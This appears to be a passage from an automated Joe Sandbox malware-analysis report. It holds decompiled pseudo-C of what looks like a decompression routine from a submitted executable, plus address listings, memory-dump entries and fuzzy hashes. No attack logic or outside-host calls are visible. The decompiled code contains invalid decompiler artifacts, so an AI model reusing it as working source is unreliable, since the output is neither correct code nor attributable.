                      								__ecx =  *(__ebp - 0x40);
                      								__ebx =  *(__ebp - 0x50);
                      								0 = 1;
                      								__eax = 1 << __cl;
                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                      								__eax =  *(__ebp - 0x7c);
                      								 *(__ebp - 0x44) = __ebx;
                      								goto L140;
                      							}
                      							__eax =  *(__ebp - 0x50);
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      							__eax =  *(__ebp - 0x58);
                      							__esi = __edx + __eax;
                      							 *(__ebp - 0x54) = __esi;
                      							__ax =  *__esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							__eflags =  *(__ebp - 0xc) - __ecx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								__cx = __ax >> 5;
                      								__eax = __eax - __ecx;
                      								__edx = __edx + 1;
                      								__eflags = __edx;
                      								 *__esi = __ax;
                      								 *(__ebp - 0x50) = __edx;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      								 *__esi = __cx;
                      							}
                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								goto L148;
                      							} else {
                      								goto L146;
                      							}
                      						case 0x19:
                      							__eflags = __ebx - 4;
                      							if(__ebx < 4) {
                      								 *(__ebp - 0x2c) = __ebx;
                      								L119:
                      								_t393 = __ebp - 0x2c;
                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                      								__eflags =  *_t393;
                      								L120:
                      								__eax =  *(__ebp - 0x2c);
                      								__eflags = __eax;
                      								if(__eax == 0) {
                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                      									goto L170;
                      								}
                      								__eflags = __eax -  *(__ebp - 0x60);
                      								if(__eax >  *(__ebp - 0x60)) {
                      									goto L171;
                      								}
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                      								__eax =  *(__ebp - 0x30);
                      								_t400 = __ebp - 0x60;
                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                      								__eflags =  *_t400;
                      								goto L123;
                      							}
                      							__ecx = __ebx;
                      							__eax = __ebx;
                      							__ecx = __ebx >> 1;
                      							__eax = __ebx & 0x00000001;
                      							__ecx = (__ebx >> 1) - 1;
                      							__al = __al | 0x00000002;
                      							__eax = (__ebx & 0x00000001) << __cl;
                      							__eflags = __ebx - 0xe;
                      							 *(__ebp - 0x2c) = __eax;
                      							if(__ebx >= 0xe) {
                      								__ebx = 0;
                      								 *(__ebp - 0x48) = __ecx;
                      								L102:
                      								__eflags =  *(__ebp - 0x48);
                      								if( *(__ebp - 0x48) <= 0) {
                      									__eax = __eax + __ebx;
                      									 *(__ebp - 0x40) = 4;
                      									 *(__ebp - 0x2c) = __eax;
                      									__eax =  *(__ebp - 4);
                      									__eax =  *(__ebp - 4) + 0x644;
                      									__eflags = __eax;
                      									L108:
                      									__ebx = 0;
                      									 *(__ebp - 0x58) = __eax;
                      									 *(__ebp - 0x50) = 1;
                      									 *(__ebp - 0x44) = 0;
                      									 *(__ebp - 0x48) = 0;
                      									L112:
                      									__eax =  *(__ebp - 0x40);
                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                      										_t391 = __ebp - 0x2c;
                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                      										__eflags =  *_t391;
                      										goto L119;
                      									}
                      									__eax =  *(__ebp - 0x50);
                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                      									__eax =  *(__ebp - 0x58);
                      									__esi = __edi + __eax;
                      									 *(__ebp - 0x54) = __esi;
                      									__ax =  *__esi;
                      									__ecx = __ax & 0x0000ffff;
                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                      									__eflags =  *(__ebp - 0xc) - __edx;
                      									if( *(__ebp - 0xc) >= __edx) {
                      										__ecx = 0;
                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                      										__ecx = 1;
                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                      										__ebx = 1;
                      										__ecx =  *(__ebp - 0x48);
                      										__ebx = 1 << __cl;
                      										__ecx = 1 << __cl;
                      										__ebx =  *(__ebp - 0x44);
                      										__ebx =  *(__ebp - 0x44) | __ecx;
                      										__cx = __ax;
                      										__cx = __ax >> 5;
                      										__eax = __eax - __ecx;
                      										__edi = __edi + 1;
                      										__eflags = __edi;
                      										 *(__ebp - 0x44) = __ebx;
                      										 *__esi = __ax;
                      										 *(__ebp - 0x50) = __edi;
                      									} else {
                      										 *(__ebp - 0x10) = __edx;
                      										0x800 = 0x800 - __ecx;
                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                      										 *__esi = __dx;
                      									}
                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                      									if( *(__ebp - 0x10) >= 0x1000000) {
                      										L111:
                      										_t368 = __ebp - 0x48;
                      										 *_t368 =  *(__ebp - 0x48) + 1;
                      										__eflags =  *_t368;
                      										goto L112;
                      									} else {
                      										goto L109;
                      									}
                      								}
                      								__ecx =  *(__ebp - 0xc);
                      								__ebx = __ebx + __ebx;
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      								 *(__ebp - 0x44) = __ebx;
                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                      									__ecx =  *(__ebp - 0x10);
                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                      									__ebx = __ebx | 0x00000001;
                      									__eflags = __ebx;
                      									 *(__ebp - 0x44) = __ebx;
                      								}
                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                      								if( *(__ebp - 0x10) >= 0x1000000) {
                      									L101:
                      									_t338 = __ebp - 0x48;
                      									 *_t338 =  *(__ebp - 0x48) - 1;
                      									__eflags =  *_t338;
                      									goto L102;
                      								} else {
                      									goto L99;
                      								}
                      							}
                      							__edx =  *(__ebp - 4);
                      							__eax = __eax - __ebx;
                      							 *(__ebp - 0x40) = __ecx;
                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                      							goto L108;
                      						case 0x1a:
                      							L56:
                      							__eflags =  *(__ebp - 0x64);
                      							if( *(__ebp - 0x64) == 0) {
                      								 *(__ebp - 0x88) = 0x1a;
                      								goto L170;
                      							}
                      							__ecx =  *(__ebp - 0x68);
                      							__al =  *(__ebp - 0x5c);
                      							__edx =  *(__ebp - 8);
                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      							 *( *(__ebp - 0x68)) = __al;
                      							__ecx =  *(__ebp - 0x14);
                      							 *(__ecx +  *(__ebp - 8)) = __al;
                      							__eax = __ecx + 1;
                      							__edx = 0;
                      							_t192 = __eax %  *(__ebp - 0x74);
                      							__eax = __eax /  *(__ebp - 0x74);
                      							__edx = _t192;
                      							goto L79;
                      						case 0x1b:
                      							goto L75;
                      						case 0x1c:
                      							while(1) {
                      								L123:
                      								__eflags =  *(__ebp - 0x64);
                      								if( *(__ebp - 0x64) == 0) {
                      									break;
                      								}
                      								__eax =  *(__ebp - 0x14);
                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      								__eflags = __eax -  *(__ebp - 0x74);
                      								if(__eax >=  *(__ebp - 0x74)) {
                      									__eax = __eax +  *(__ebp - 0x74);
                      									__eflags = __eax;
                      								}
                      								__edx =  *(__ebp - 8);
                      								__cl =  *(__eax + __edx);
                      								__eax =  *(__ebp - 0x14);
                      								 *(__ebp - 0x5c) = __cl;
                      								 *(__eax + __edx) = __cl;
                      								__eax = __eax + 1;
                      								__edx = 0;
                      								_t414 = __eax %  *(__ebp - 0x74);
                      								__eax = __eax /  *(__ebp - 0x74);
                      								__edx = _t414;
                      								__eax =  *(__ebp - 0x68);
                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                      								__eflags =  *(__ebp - 0x30);
                      								 *( *(__ebp - 0x68)) = __cl;
                      								 *(__ebp - 0x14) = _t414;
                      								if( *(__ebp - 0x30) > 0) {
                      									continue;
                      								} else {
                      									goto L80;
                      								}
                      							}
                      							 *(__ebp - 0x88) = 0x1c;
                      							goto L170;
                      					}
                      				}
                      			}













                      0x00000000
                      0x004070ab
                      0x004070ab
                      0x004070af
                      0x00407166
                      0x00407169
                      0x00407175
                      0x00407056
                      0x00407056
                      0x00407059
                      0x004073cb
                      0x004073cb
                      0x004073ce
                      0x004073ce
                      0x004073d4
                      0x004073da
                      0x004073e0
                      0x004073fa
                      0x004073fd
                      0x00407403
                      0x0040740e
                      0x00407410
                      0x004073e2
                      0x004073e2
                      0x004073f1
                      0x004073f5
                      0x004073f5
                      0x0040741a
                      0x00407441
                      0x00407441
                      0x00407447
                      0x00407447
                      0x00000000
                      0x0040741c
                      0x0040741c
                      0x00407420
                      0x004075cf
                      0x00000000
                      0x004075cf
                      0x0040742c
                      0x00407433
                      0x0040743b
                      0x0040743e
                      0x00000000
                      0x0040743e
                      0x004070b5
                      0x004070b9
                      0x004075fa
                      0x004075fa
                      0x004075fd
                      0x00407601
                      0x00407601
                      0x004070bf
                      0x004070c5
                      0x004070c8
                      0x004070cc
                      0x004070cf
                      0x004070d3
                      0x00407599
                      0x004075e5
                      0x004075ed
                      0x004075f4
                      0x004075f6
                      0x00000000
                      0x004075f6
                      0x004070d9
                      0x004070dc
                      0x004070e2
                      0x004070e4
                      0x004070e4
                      0x004070e7
                      0x004070ea
                      0x004070ed
                      0x004070f0
                      0x004070f3
                      0x004070f6
                      0x004070f7
                      0x004070f9
                      0x004070f9
                      0x004070f9
                      0x004070fc
                      0x004070ff
                      0x00407102
                      0x00407105
                      0x00407105
                      0x00407108
                      0x0040710a
                      0x0040710a
                      0x0040710d
                      0x0040710d
                      0x0040710d
                      0x00406be3
                      0x00406be3
                      0x00406bec
                      0x00000000
                      0x00000000
                      0x00406bf2
                      0x00000000
                      0x00406bfd
                      0x00000000
                      0x00000000
                      0x00406c06
                      0x00406c09
                      0x00406c0c
                      0x00406c10
                      0x00000000
                      0x00000000
                      0x00406c16
                      0x00406c19
                      0x00406c1b
                      0x00406c1c
                      0x00406c1f
                      0x00406c21
                      0x00406c22
                      0x00406c24
                      0x00406c27
                      0x00406c2c
                      0x00406c31
                      0x00406c3a
                      0x00406c4d
                      0x00406c50
                      0x00406c5c
                      0x00406c84
                      0x00406c86
                      0x00406c94
                      0x00406c94
                      0x00406c98
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406c88
                      0x00406c88
                      0x00406c8b
                      0x00406c8c
                      0x00406c8c
                      0x00000000
                      0x00406c88
                      0x00406c62
                      0x00406c67
                      0x00406c67
                      0x00406c70
                      0x00406c78
                      0x00406c7b
                      0x00000000
                      0x00406c81
                      0x00406c81
                      0x00000000
                      0x00406c81
                      0x00000000
                      0x00406c9e
                      0x00406c9e
                      0x00406ca2
                      0x0040754e
                      0x00000000
                      0x0040754e
                      0x00406cab
                      0x00406cbb
                      0x00406cbe
                      0x00406cc1
                      0x00406cc1
                      0x00406cc1
                      0x00406cc4
                      0x00406cc8
                      0x00000000
                      0x00000000
                      0x00406cca
                      0x00406cd0
                      0x00406cfa
                      0x00406d00
                      0x00406d07
                      0x00000000
                      0x00406d07
                      0x00406cd6
                      0x00406cd9
                      0x00406cde
                      0x00406cde
                      0x00406ce9
                      0x00406cf1
                      0x00406cf4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406d39
                      0x00406d3f
                      0x00406d42
                      0x00406d4f
                      0x00406d57
                      0x00000000
                      0x00000000
                      0x00406d0e
                      0x00406d0e
                      0x00406d12
                      0x0040755d
                      0x00000000
                      0x0040755d
                      0x00406d1e
                      0x00406d29
                      0x00406d29
                      0x00406d29
                      0x00406d2c
                      0x00406d2f
                      0x00406d32
                      0x00406d37
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406d5f
                      0x00406d61
                      0x00406d64
                      0x00406dd5
                      0x00406dd8
                      0x00406ddb
                      0x00406de2
                      0x00406dec
                      0x00000000
                      0x00406dec
                      0x00406d66
                      0x00406d6a
                      0x00406d6d
                      0x00406d6f
                      0x00406d72
                      0x00406d75
                      0x00406d77
                      0x00406d7a
                      0x00406d7c
                      0x00406d81
                      0x00406d84
                      0x00406d87
                      0x00406d8b
                      0x00406d92
                      0x00406d95
                      0x00406d9c
                      0x00406da0
                      0x00406da8
                      0x00406da8
                      0x00406da8
                      0x00406da2
                      0x00406da2
                      0x00406da2
                      0x00406d97
                      0x00406d97
                      0x00406d97
                      0x00406dac
                      0x00406daf
                      0x00406dcd
                      0x00406dcf
                      0x00000000
                      0x00406db1
                      0x00406db1
                      0x00406db4
                      0x00406db7
                      0x00406dba
                      0x00406dbc
                      0x00406dbc
                      0x00406dbc
                      0x00406dbf
                      0x00406dc2
                      0x00406dc4
                      0x00406dc5
                      0x00406dc8
                      0x00000000
                      0x00406dc8
                      0x00000000
                      0x00406ffe
                      0x00407002
                      0x00407020
                      0x00407023
                      0x0040702a
                      0x0040702d
                      0x00407030
                      0x00407033
                      0x00407036
                      0x00407039
                      0x0040703b
                      0x00407042
                      0x00407043
                      0x00407045
                      0x00407048
                      0x0040704b
                      0x0040704e
                      0x0040704e
                      0x00407053
                      0x00000000
                      0x00407053
                      0x00407004
                      0x00407007
                      0x0040700a
                      0x00407014
                      0x00000000
                      0x00000000
                      0x00407068
                      0x0040706c
                      0x0040708f
                      0x00407092
                      0x00407095
                      0x0040709f
                      0x0040706e
                      0x0040706e
                      0x00407071
                      0x00407074
                      0x00407077
                      0x00407084
                      0x00407087
                      0x00407087
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040711c
                      0x00407120
                      0x00407127
                      0x0040712a
                      0x0040712d
                      0x00407137
                      0x00000000
                      0x00407137
                      0x00407122
                      0x00000000
                      0x00000000
                      0x00407143
                      0x00407147
                      0x0040714e
                      0x00407151
                      0x00407154
                      0x00407149
                      0x00407149
                      0x00407149
                      0x00407157
                      0x0040715a
                      0x0040715d
                      0x0040715d
                      0x00407160
                      0x00407163
                      0x00000000
                      0x00000000
                      0x00407203
                      0x00407203
                      0x00407207
                      0x004075a5
                      0x00000000
                      0x004075a5
                      0x0040720d
                      0x00407210
                      0x00407213
                      0x00407217
                      0x0040721a
                      0x00407220
                      0x00407222
                      0x00407222
                      0x00407222
                      0x00407225
                      0x00407228
                      0x00000000
                      0x00000000
                      0x00406df8
                      0x00406df8
                      0x00406dfc
                      0x00407569
                      0x00000000
                      0x00407569
                      0x00406e02
                      0x00406e05
                      0x00406e08
                      0x00406e0c
                      0x00406e0f
                      0x00406e15
                      0x00406e17
                      0x00406e17
                      0x00406e17
                      0x00406e1a
                      0x00406e1d
                      0x00406e1d
                      0x00406e20
                      0x00406e23
                      0x00000000
                      0x00000000
                      0x00406e29
                      0x00406e2f
                      0x00000000
                      0x00000000
                      0x00406e35
                      0x00406e35
                      0x00406e39
                      0x00406e3c
                      0x00406e3f
                      0x00406e42
                      0x00406e45
                      0x00406e46
                      0x00406e49
                      0x00406e4b
                      0x00406e51
                      0x00406e54
                      0x00406e57
                      0x00406e5a
                      0x00406e5d
                      0x00406e60
                      0x00406e63
                      0x00406e7f
                      0x00406e82
                      0x00406e85
                      0x00406e88
                      0x00406e8f
                      0x00406e93
                      0x00406e95
                      0x00406e99
                      0x00406e65
                      0x00406e65
                      0x00406e69
                      0x00406e71
                      0x00406e76
                      0x00406e78
                      0x00406e7a
                      0x00406e7a
                      0x00406e9c
                      0x00406ea3
                      0x00406ea6
                      0x00000000
                      0x00406eac
                      0x00000000
                      0x00406eac
                      0x00000000
                      0x00406eb1
                      0x00406eb1
                      0x00406eb5
                      0x00407575
                      0x00000000
                      0x00407575
                      0x00406ebb
                      0x00406ebe
                      0x00406ec1
                      0x00406ec5
                      0x00406ec8
                      0x00406ece
                      0x00406ed0
                      0x00406ed0
                      0x00406ed0
                      0x00406ed3
                      0x00406ed6
                      0x00406ed6
                      0x00406ed6
                      0x00406edc
                      0x00000000
                      0x00000000
                      0x00406ede
                      0x00406ee1
                      0x00406ee4
                      0x00406ee7
                      0x00406eea
                      0x00406eed
                      0x00406ef0
                      0x00406ef3
                      0x00406ef6
                      0x00406ef9
                      0x00406efc
                      0x00406f14
                      0x00406f17
                      0x00406f1a
                      0x00406f1d
                      0x00406f1d
                      0x00406f20
                      0x00406f24
                      0x00406f26
                      0x00406efe
                      0x00406efe
                      0x00406f06
                      0x00406f0b
                      0x00406f0d
                      0x00406f0f
                      0x00406f0f
                      0x00406f29
                      0x00406f30
                      0x00406f33
                      0x00000000
                      0x00406f35
                      0x00000000
                      0x00406f35
                      0x00406f33
                      0x00406f3a
                      0x00406f3a
                      0x00406f3a
                      0x00406f3a
                      0x00000000
                      0x00000000
                      0x00406f75
                      0x00406f75
                      0x00406f79
                      0x00407581
                      0x00000000
                      0x00407581
                      0x00406f7f
                      0x00406f82
                      0x00406f85
                      0x00406f89
                      0x00406f8c
                      0x00406f92
                      0x00406f94
                      0x00406f94
                      0x00406f94
                      0x00406f97
                      0x00406f9a
                      0x00406f9a
                      0x00406fa0
                      0x00406f3e
                      0x00406f3e
                      0x00406f41
                      0x00000000
                      0x00406f41
                      0x00406fa2
                      0x00406fa2
                      0x00406fa5
                      0x00406fa8
                      0x00406fab
                      0x00406fae
                      0x00406fb1
                      0x00406fb4
                      0x00406fb7
                      0x00406fba
                      0x00406fbd
                      0x00406fc0
                      0x00406fd8
                      0x00406fdb
                      0x00406fde
                      0x00406fe1
                      0x00406fe1
                      0x00406fe4
                      0x00406fe8
                      0x00406fea
                      0x00406fc2
                      0x00406fc2
                      0x00406fca
                      0x00406fcf
                      0x00406fd1
                      0x00406fd3
                      0x00406fd3
                      0x00406fed
                      0x00406ff4
                      0x00406ff7
                      0x00000000
                      0x00406ff9
                      0x00000000
                      0x00406ff9
                      0x00000000
                      0x00407286
                      0x00407286
                      0x0040728a
                      0x004075b1
                      0x00000000
                      0x004075b1
                      0x00407290
                      0x00407293
                      0x00407296
                      0x0040729a
                      0x0040729d
                      0x004072a3
                      0x004072a5
                      0x004072a5
                      0x004072a5
                      0x004072a8
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00407395
                      0x00407399
                      0x004073bb
                      0x004073be
                      0x004073c8
                      0x00000000
                      0x004073c8
                      0x0040739b
                      0x0040739e
                      0x004073a2
                      0x004073a5
                      0x004073a5
                      0x004073a8
                      0x00000000
                      0x00000000
                      0x00407452
                      0x00407456
                      0x00407474
                      0x00407474
                      0x00407474
                      0x0040747b
                      0x00407482
                      0x00407489
                      0x00407489
                      0x00000000
                      0x00407489
                      0x00407458
                      0x0040745b
                      0x0040745e
                      0x00407461
                      0x00407468
                      0x004073ac
                      0x004073ac
                      0x004073af
                      0x00000000
                      0x00000000
                      0x00407543
                      0x00407546
                      0x00000000
                      0x00000000
                      0x0040717d
                      0x0040717f
                      0x00407186
                      0x00407187
                      0x00407189
                      0x0040718c
                      0x00000000
                      0x00000000
                      0x00407194
                      0x00407197
                      0x0040719a
                      0x0040719c
                      0x0040719e
                      0x0040719e
                      0x0040719f
                      0x004071a2
                      0x004071a9
                      0x004071ac
                      0x004071ba
                      0x00000000
                      0x00000000
                      0x00407490
                      0x00407490
                      0x00407493
                      0x0040749a
                      0x00000000
                      0x00000000
                      0x0040749f
                      0x0040749f
                      0x004074a3
                      0x004075db
                      0x00000000
                      0x004075db
                      0x004074a9
                      0x004074ac
                      0x004074af
                      0x004074b3
                      0x004074b6
                      0x004074bc
                      0x004074be
                      0x004074be
                      0x004074be
                      0x004074c1
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c7
                      0x004074c7
                      0x004074cb
                      0x0040752b
                      0x0040752e
                      0x00407533
                      0x00407534
                      0x00407536
                      0x00407538
                      0x0040753b
                      0x00000000
                      0x0040753b
                      0x004074cd
                      0x004074d3
                      0x004074d6
                      0x004074d9
                      0x004074dc
                      0x004074df
                      0x004074e2
                      0x004074e5
                      0x004074e8
                      0x004074eb
                      0x004074ee
                      0x00407507
                      0x0040750a
                      0x0040750d
                      0x00407510
                      0x00407514
                      0x00407516
                      0x00407516
                      0x00407517
                      0x0040751a
                      0x004074f0
                      0x004074f0
                      0x004074f8
                      0x004074fd
                      0x004074ff
                      0x00407502
                      0x00407502
                      0x0040751d
                      0x00407524
                      0x00000000
                      0x00407526
                      0x00000000
                      0x00407526
                      0x00000000
                      0x004071c2
                      0x004071c5
                      0x004071fb
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732e
                      0x0040732e
                      0x00407331
                      0x00407333
                      0x004075bd
                      0x00000000
                      0x004075bd
                      0x00407339
                      0x0040733c
                      0x00000000
                      0x00000000
                      0x00407342
                      0x00407346
                      0x00407349
                      0x00407349
                      0x00407349
                      0x00000000
                      0x00407349
                      0x004071c7
                      0x004071c9
                      0x004071cb
                      0x004071cd
                      0x004071d0
                      0x004071d1
                      0x004071d3
                      0x004071d5
                      0x004071d8
                      0x004071db
                      0x004071f1
                      0x004071f6
                      0x0040722e
                      0x0040722e
                      0x00407232
                      0x0040725e
                      0x00407260
                      0x00407267
                      0x0040726a
                      0x0040726d
                      0x0040726d
                      0x00407272
                      0x00407272
                      0x00407274
                      0x00407277
                      0x0040727e
                      0x00407281
                      0x004072ae
                      0x004072ae
                      0x004072b1
                      0x004072b4
                      0x00407328
                      0x00407328
                      0x00407328
                      0x00000000
                      0x00407328
                      0x004072b6
                      0x004072bc
                      0x004072bf
                      0x004072c2
                      0x004072c5
                      0x004072c8
                      0x004072cb
                      0x004072ce
                      0x004072d1
                      0x004072d4
                      0x004072d7
                      0x004072f0
                      0x004072f2
                      0x004072f5
                      0x004072f6
                      0x004072f9
                      0x004072fb
                      0x004072fe
                      0x00407300
                      0x00407302
                      0x00407305
                      0x00407307
                      0x0040730a
                      0x0040730e
                      0x00407310
                      0x00407310
                      0x00407311
                      0x00407314
                      0x00407317
                      0x004072d9
                      0x004072d9
                      0x004072e1
                      0x004072e6
                      0x004072e8
                      0x004072eb
                      0x004072eb
                      0x0040731a
                      0x00407321
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x00000000
                      0x00407323
                      0x00000000
                      0x00407323
                      0x00407321
                      0x00407234
                      0x00407237
                      0x00407239
                      0x0040723c
                      0x0040723f
                      0x00407242
                      0x00407244
                      0x00407247
                      0x0040724a
                      0x0040724a
                      0x0040724d
                      0x0040724d
                      0x00407250
                      0x00407257
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x00000000
                      0x00407259
                      0x00000000
                      0x00407259
                      0x00407257
                      0x004071dd
                      0x004071e0
                      0x004071e2
                      0x004071e5
                      0x00000000
                      0x00000000
                      0x00406f44
                      0x00406f44
                      0x00406f48
                      0x0040758d
                      0x00000000
                      0x0040758d
                      0x00406f4e
                      0x00406f51
                      0x00406f54
                      0x00406f57
                      0x00406f5a
                      0x00406f5d
                      0x00406f60
                      0x00406f62
                      0x00406f65
                      0x00406f68
                      0x00406f6b
                      0x00406f6d
                      0x00406f6d
                      0x00406f6d
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x0040734c
                      0x0040734c
                      0x0040734c
                      0x00407350
                      0x00000000
                      0x00000000
                      0x00407356
                      0x00407359
                      0x0040735c
                      0x0040735f
                      0x00407361
                      0x00407361
                      0x00407361
                      0x00407364
                      0x00407367
                      0x0040736a
                      0x0040736d
                      0x00407370
                      0x00407373
                      0x00407374
                      0x00407376
                      0x00407376
                      0x00407376
                      0x00407379
                      0x0040737c
                      0x0040737f
                      0x00407382
                      0x00407385
                      0x00407389
                      0x0040738b
                      0x0040738e
                      0x00000000
                      0x00407390
                      0x00000000
                      0x00407390
                      0x0040738e
                      0x004075c3
                      0x00000000
                      0x00000000
                      0x00406bf2

                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                      • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                      • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                      • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00406BB0(void* __ecx) {
                      				void* _v8;
                      				void* _v12;
                      				signed int _v16;
                      				unsigned int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v32;
                      				signed int _v36;
                      				signed int _v40;
                      				signed int _v44;
                      				signed int _v48;
                      				signed int _v52;
                      				signed int _v56;
                      				signed int _v60;
                      				signed int _v64;
                      				signed int _v68;
                      				signed int _v72;
                      				signed int _v76;
                      				signed int _v80;
                      				signed int _v84;
                      				signed int _v88;
                      				signed int _v92;
                      				signed int _v95;
                      				signed int _v96;
                      				signed int _v100;
                      				signed int _v104;
                      				signed int _v108;
                      				signed int _v112;
                      				signed int _v116;
                      				signed int _v120;
                      				intOrPtr _v124;
                      				signed int _v128;
                      				signed int _v132;
                      				signed int _v136;
                      				void _v140;
                      				void* _v148;
                      				signed int _t537;
                      				signed int _t538;
                      				signed int _t572;
                      
                      				_t572 = 0x22;
                      				_v148 = __ecx;
                      				memcpy( &_v140, __ecx, _t572 << 2);
                      				if(_v52 == 0xffffffff) {
                      					return 1;
                      				}
                      				while(1) {
                      					L3:
                      					_t537 = _v140;
                      					if(_t537 > 0x1c) {
                      						break;
                      					}
                      					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                      						case 0:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								goto L173;
                      							}
                      							_v112 = _v112 - 1;
                      							_v116 = _v116 + 1;
                      							_t537 =  *_v116;
                      							__eflags = _t537 - 0xe1;
                      							if(_t537 > 0xe1) {
                      								goto L174;
                      							}
                      							_t542 = _t537 & 0x000000ff;
                      							_push(0x2d);
                      							asm("cdq");
                      							_pop(_t576);
                      							_push(9);
                      							_pop(_t577);
                      							_t622 = _t542 / _t576;
                      							_t544 = _t542 % _t576 & 0x000000ff;
                      							asm("cdq");
                      							_t617 = _t544 % _t577 & 0x000000ff;
                      							_v64 = _t617;
                      							_v32 = (1 << _t622) - 1;
                      							_v28 = (1 << _t544 / _t577) - 1;
                      							_t625 = (0x300 << _t617 + _t622) + 0x736;
                      							__eflags = 0x600 - _v124;
                      							if(0x600 == _v124) {
                      								L12:
                      								__eflags = _t625;
                      								if(_t625 == 0) {
                      									L14:
                      									_v76 = _v76 & 0x00000000;
                      									_v68 = _v68 & 0x00000000;
                      									goto L17;
                      								} else {
                      									goto L13;
                      								}
                      								do {
                      									L13:
                      									_t625 = _t625 - 1;
                      									__eflags = _t625;
                      									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                      								} while (_t625 != 0);
                      								goto L14;
                      							}
                      							__eflags = _v8;
                      							if(_v8 != 0) {
                      								GlobalFree(_v8);
                      							}
                      							_t537 = GlobalAlloc(0x40, 0x600); // executed
                      							__eflags = _t537;
                      							_v8 = _t537;
                      							if(_t537 == 0) {
                      								goto L174;
                      							} else {
                      								_v124 = 0x600;
                      								goto L12;
                      							}
                      						case 1:
                      							L15:
                      							__eflags = _v112;
                      							if(_v112 == 0) {
                      								_v140 = 1;
                      								goto L173;
                      							}
